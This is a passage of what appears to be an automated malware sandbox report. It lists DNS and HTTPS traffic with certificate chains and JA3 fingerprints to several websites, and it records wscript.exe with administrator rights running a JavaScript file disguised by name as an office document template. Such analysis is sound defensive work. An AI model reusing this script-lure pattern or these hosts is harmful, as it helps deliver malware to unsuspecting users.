                Aug 21, 2021 17:39:17.582353115 CEST8.8.8.8192.168.2.60xc557No error (0)www.edmondoberselli.net188.40.120.141A (IP address)IN (0x0001)

                HTTPS Packets

                TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                Aug 21, 2021 17:38:31.372118950 CEST217.30.63.12443192.168.2.649689CN=dischner-kartsport.de CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Fri Jul 02 20:56:18 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021Thu Sep 30 20:56:17 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                CN=R3, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USFri Sep 04 02:00:00 CEST 2020Mon Sep 15 18:00:00 CEST 2025
                CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 20 20:14:03 CET 2021Mon Sep 30 20:14:03 CEST 2024
                Aug 21, 2021 17:38:54.392071962 CEST74.124.194.166443192.168.2.649690CN=ehiac.com CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBMon Jul 12 02:00:00 CEST 2021 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004Mon Oct 11 01:59:59 CEST 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=USCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBMon May 18 02:00:00 CEST 2015Sun May 18 01:59:59 CEST 2025
                CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029
                Aug 21, 2021 17:39:17.641700029 CEST188.40.120.141443192.168.2.649691CN=www.edmondoberselli.net CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sat Aug 07 00:05:48 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021Thu Nov 04 23:05:46 CET 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                CN=R3, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USFri Sep 04 02:00:00 CEST 2020Mon Sep 15 18:00:00 CEST 2025
                CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 20 20:14:03 CET 2021Mon Sep 30 20:14:03 CEST 2024

                Code Manipulations

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                System Behavior

                General

                Start time:17:35:32
                Start date:21/08/2021
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\kauffrau_f#U00fcr_b#U00fcromanagement_muster_report_assistenz_und_sekretariat.js'
                Imagebase:0x7ff6c6b90000
                File size:163840 bytes
                MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                Code Analysis

                Reset < >